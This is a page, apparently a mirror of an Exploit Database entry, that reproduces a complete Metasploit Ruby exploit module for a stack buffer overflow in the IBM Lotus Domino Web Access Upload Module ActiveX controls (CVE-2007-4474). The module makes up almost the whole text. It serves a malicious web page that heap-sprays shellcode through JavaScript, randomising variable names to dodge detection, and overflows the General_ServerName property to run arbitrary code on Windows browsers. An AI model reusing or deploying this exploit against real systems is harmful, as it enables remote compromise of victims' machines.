IBM Lotus Domino Web Access Upload Module – Remote Buffer Overflow (Metasploit)

• Exploit Database
• 102 阅读

• 作者： Metasploit
  日期： 2010-09-20
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16502/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136

  ## # $Id: ibmlotusdomino_dwa_uploadmodule.rb 10394 2010-09-20 08:06:27Z jduck $ ##   ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking   include Msf::Exploit::Remote::HttpServer::HTML   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;IBM Lotus Domino Web Access Upload Module Buffer Overflow&apos;, &apos;Description&apos;=> %q{ This module exploits a stack buffer overflow in IBM Lotus Domino Web Access Upload Module. By sending an overly long string to the "General_ServerName()" property located in the dwa7w.dll and the inotes6w.dll control, an attacker may be able to execute arbitrary code. }, &apos;License&apos;=> MSF_LICENSE, &apos;Author&apos; => [ &apos;Elazar Broad <elazarb[at]earthlink.net>&apos; ], &apos;Version&apos;=> &apos;$Revision: 10394 $&apos;, &apos;References&apos; => [ [ &apos;CVE&apos;, &apos;2007-4474&apos; ], [ &apos;OSVDB&apos;, &apos;40954&apos; ], [ &apos;BID&apos;, &apos;26972&apos; ], [ &apos;URL&apos;, &apos;http://milw0rm.com/exploits/4820&apos; ], ], &apos;DefaultOptions&apos; => { &apos;EXITFUNC&apos; => &apos;process&apos;, }, &apos;Payload&apos;=> { &apos;Space&apos; => 800, &apos;BadChars&apos;=> "\x00\x09\x0a\x0d&apos;\\", &apos;StackAdjustment&apos; => -3500, }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos;=> [ [ &apos;Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English&apos;, { &apos;Ret&apos; => 0x0C0C0C0C } ] ], &apos;DisclosureDate&apos; => &apos;Dec 20 2007&apos;, &apos;DefaultTarget&apos;=> 0)) end   def autofilter false end   def check_dependencies use_zlib end   def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil)   # Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))   # Setup exploit buffers nops = Rex::Text.to_unescape(make_nops(4)) junk = Rex::Text.to_unescape(rand_text_alpha(2)) ret = Rex::Text.to_unescape([target.ret].pack(&apos;V&apos;)) blocksize = 0x30000 fillto= 400   # Randomize the javascript variable names dwa7w= rand_text_alpha(rand(100) + 1) inotes6= rand_text_alpha(rand(100) + 1) j_shellcode= rand_text_alpha(rand(100) + 1) j_nops = rand_text_alpha(rand(100) + 1) j_headersize = rand_text_alpha(rand(100) + 1) j_slackspace = rand_text_alpha(rand(100) + 1) j_fillblock= rand_text_alpha(rand(100) + 1) j_block= rand_text_alpha(rand(100) + 1) j_memory = rand_text_alpha(rand(100) + 1) j_counter= rand_text_alpha(rand(30) + 2) j_ret= rand_text_alpha(rand(100) + 1) j_junk = rand_text_alpha(rand(100) + 1)     # Build out the message content = <<-EOF <html> <object classid=&apos;clsid:E008A543-CEFB-4559-912F-C27C2B89F13B&apos; id=&apos;#{dwa7w}&apos;></object> <object classid=&apos;clsid:3BFFE033-BF43-11D5-A271-00A024A51325&apos; id=&apos;#{inotes6}&apos;></object> <script language=&apos;javascript&apos;> #{j_shellcode} = unescape(&apos;#{shellcode}&apos;); #{j_nops} = unescape(&apos;#{nops}&apos;); #{j_headersize} = 20; #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops}; #{j_fillblock} = #{j_nops}.substring(0, #{j_slackspace}); #{j_block} = #{j_nops}.substring(0, #{j_nops}.length - #{j_slackspace}); while(#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock}; #{j_memory} = new Array(); for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) #{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode}; #{j_ret} = unescape(&apos;#{ret}&apos;); while (#{j_ret}.length < 450) #{j_ret} += #{j_ret}; #{j_junk} = unescape(&apos;#{junk}&apos;); while (#{j_junk}.length < 2000) #{j_junk} += #{j_junk}; try { #{dwa7w}.General_ServerName = #{j_junk} + #{j_ret}; #{dwa7w}.InstallBrowserHelperDll(); } catch(err) {} try { #{inotes6}.General_ServerName = #{j_junk} + #{j_ret}; #{inotes6}.InstallBrowserHelperDll(); } catch(err) {} </script> </html> EOF   print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")   # Transmit the response to the client send_response_html(cli, content)   # Handle the payload handler(cli) end   end